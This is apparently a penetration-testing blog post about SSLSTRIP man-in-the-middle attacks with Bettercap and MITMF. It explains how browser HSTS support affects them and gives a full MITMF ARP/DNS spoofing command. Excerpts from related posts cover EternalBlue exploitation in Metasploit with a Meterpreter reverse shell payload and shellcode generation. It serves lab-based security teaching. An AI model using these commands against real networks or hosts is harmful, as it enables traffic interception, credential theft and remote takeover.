SSLSTRIP attacks with Bettercap and MITMF - more info about HSTS and Web browsers

I've decided to make a follow-up video on SSLSTRIP and man-in-the-middle attacks, in order to clarify and emphasize a few things around HSTS and Web browsers.
The client Web browser version seems to be sometimes overlooked when it comes to the overall HSTS protocol.
In this video we use Bettercap and different client Web browsers, to simulate man-in-the-middle attacks against websites that are correctly HSTS configured. We will see that the attacks could be successful or not, depending on the Web browser version and capabilities.

See below a list of browsers with HSTS capabilities ( Reference: Wikipedia - HTTP_Strict_Transport_Security ):
- Chromium and Google Chrome since version 4.0.211.0
- Firefox since version 4; with Firefox 17, Mozilla integrates a list of websites supporting HSTS.
- Opera since version 12
- Safari as of OS X Mavericks
- Internet Explorer 11 on Windows 8.1 and Windows 7 when KB 3058515 is installed
- Microsoft Edge and Internet Explorer 11 on Windows 10
- BlackBerry 10 Browser and WebView since BlackBerry OS 10.3.3.

MITMF


In the second part of this video we quickly review another tool that could be used for SSLSTRIP attacks: MITMF (Man-In-The-Middle Framework). We compare MITMF with Bettercap and see a scenario where the two tools have different outcomes.

MITMF Installation

MITMF doesn't come by default installed on Kali Linux. In order to install MITMF on Kali Linux, perform the following steps:
- Update the Kali repositories: apt-get update
- Install MITMF: apt-get install mitmf

Installing MITMF on Kali Linux

MITMF command-line options

Use: mitmf -h in order to display the command-line options

MITMF command-line options

The following MITMF command was used in order to perform the man-in-the-middle SSLSTRIP attack:

mitmf -i eth0 --hsts --spoof --arp --dns --gateway 192.168.254.2 --targets 192.168.254.70

where:
-i eth0   specifies the interface to listen on (eth0 in our case; use the  ifconfig  command to list the interfaces)
--hsts   loads and enables the SSLSTRIP module
--spoof  loads the Spoof module to redirect and modify the traffic
--arp  redirects the traffic using ARP spoofing
--dns  proxies and modifies the DNS queries
--gateway 192.168.254.2  specifies the gateway IP
--targets 192.168.254.70  specifies the host(s) to attack

SSLSTRIP attacks with Bettercap and MITMF - HSTS and Web browsers



Comments

Post a comment

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Image
Previously we identified the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module.

In the video below we will exploit the MS17-010 vulnerability by using the EternalBlue Metasploit module which comes by default with Metasploit Framework.

Metasploit commands used in this video:
search ms17_010
This command identifies modules containing the "ms17_010" string.
use exploit/windows/smb/ms17_010_eternalblue
This command selects the "exploit/windows/smb/ms17_010_eternalblue" module.
show options
This command displays the options available for the selected module.
set processname lsass.exe
This commands selects the process to inject the payload into.
set rhost <IP_Address>
This command sets the target IP address.
show payloads
This command (when is executed under the module context), shows the payloads compatible with the selected module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp paylo…
Read more

Generating shellcode - using msfvenom to generate a binary payload

Image
In this video we generate a binary payload (shellcode) that we will use later on to exploit the EternalBlue Windows OS vulnerability.

The article below is an excellent introduction to how a binary payload works:
https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/

Our payload has 2 parts that will be generated independently, then combined into a single file.

The first component is the Windows x64 kernel shellcode for Eternalblue exploit and the ASM code is downloaded from the following location:
https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501

We will use "nasm" (general-purpose x86 assembler) on Kali Linux, in order to compile the kernel shellcode, by using the command below:

nasm -f bin eternalblue_x64_kshellcode.asm -o sc_x64_kernel.bin

The output for this command (and the first component for our payload) is the "sc_x64_kernel.bin" file.

The second component for our payload, is the part of the code which will create the Meterpreter shell fro…
Read more

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux

Image
In the video below we will identify computers affected by the MS17-010 vulnerability, by  using a Metasploit auxiliary scanning module.
Check also my other post on detecting the MS17-010 vulnerability by using NMAP.

MS17-010 is a severe SMB Server vulnerability which affected all Windows operating systems and was exploited by WannaCry, Petya and Bad Rabbit Ransomware.
This vulnerability was made public in March 2017 and allowed remote code execution on the victim computer. 
For more information, check the Microsoft Security Bulletin MS17-010:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010
https://support.microsoft.com/en-au/help/4013389/title

Metasploit commands used in this video:
search name:ms17_010 
This command lists the Metasploit modules containing the string "ms17_010" in the name. 
Can also simply use: search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
This command selects the module "auxiliary/scanner/smb/smb_ms17_010".
show opti…
Read more